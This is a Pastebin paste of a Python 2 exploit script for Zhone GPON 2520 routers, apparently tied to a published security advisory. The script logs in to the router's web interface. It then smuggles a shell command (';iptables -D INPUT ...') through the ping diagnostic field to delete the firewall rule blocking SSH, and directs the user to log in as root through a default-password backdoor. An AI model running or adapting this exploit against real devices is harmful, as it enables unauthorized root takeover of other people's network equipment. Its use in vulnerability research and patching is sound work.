Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # http://websec.ca/advisories/view/Zhone-GPON-2520-remote-root-shell-backdoor
- #!/usr/bin/python2
- from httplib2 import Http
- from urllib import urlencode
- import sys,time
- # main function
- if __name__ == "__main__":
- if (len(sys.argv) != 4):
- print '*********************************************************************************'
- print ' GPON Zhone R4.0.2.566b RCE & Backdoor'
- print ' Tested on'
- print ' GPON Zhone 2520'
- print ' Hardware: 0040-48-02'
- print ' Software: R4.0.2.566b'
- print ' '
- print ' Usage : python', sys.argv[0] + ' <web_user> <web_pass>'
- print ' Ex : python',sys.argv[0] + ' 192.168.15.1 root admin'
- print ' Author : Kaczinski lramirez@websec.mx '
- print ' URL : http://www.websec.mx/advisories'
- print '*********************************************************************************'
- sys.exit()
- HOST = sys.argv[1]
- USER = sys.argv[2]
- PASS = sys.argv[3]
- print '*********************************************************************************'
- print '[+] Logging in to the router: '+ HOST
- print '[+] User: '+USER
- print '[+] Pass: '+PASS
- h = Http()
- h.follow_redirects = True
- data = dict(XWebPageName="index", username=USER, password=PASS)
- resp, content = h.request("http://" + HOST + "/GponForm/LoginForm", "POST", urlencode(data))
- result = content.find("")
- if result < 0:
- print '[-] Authentication failed'
- print '*********************************************************************************'
- else:
- print '[+] Authentication succeeded'
- print '[+] Deleting the firewall rule that blocks SSH'
- data = dict(XWebPageName="diag", dest_host=";iptables -D INPUT -p all -j ACL", wan_conlist="default", diag_action="ping")
- resp, content = h.request("http://" + HOST + "/GponForm/diag_ZForm", "POST", urlencode(data))
- print '[+] The firewall rule should have been disabled, please ssh root@' + HOST + ' using admin as password to get your root shell :)'
- print '[+] Done'
- resp, content = h.request("http://" + HOST + "/logout.html", "GET")
- sys.exit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement